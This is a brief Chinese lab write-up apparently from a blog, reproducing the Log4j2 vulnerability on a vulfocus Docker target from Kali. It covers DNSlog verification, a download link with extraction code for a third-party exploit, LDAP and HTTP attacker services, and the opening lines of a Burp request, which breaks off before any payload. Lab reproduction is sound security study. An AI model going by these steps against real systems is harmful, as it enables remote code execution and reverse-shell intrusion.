log4j2核弹级漏洞靶场复现(反弹shell)
环境搭建:
本次漏洞复现采用vulfocus的log4j2靶场docker
使用Kali系统进行复现实验
搭建docker拉取漏洞镜像可参考以下链接:
https://blog.csdn.net/weixin_47019868/article/details/122010972
log4漏洞镜像
启动环境
漏洞验证:
dnslog回显则漏洞存在
漏洞利用:
接下来利用漏洞反弹shell,这里用的是大佬的exp,百度云链接如下:
链接:https://pan.baidu.com/s/1ABBPDmtMQktehVBt5MYwvg
提取码:gr3n
kali攻击机启动ldap服务和http服务
burpsuite构造payload
POST /hello HTTP/1.1
Host: 192.168.10.244:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox
共有 0 条评论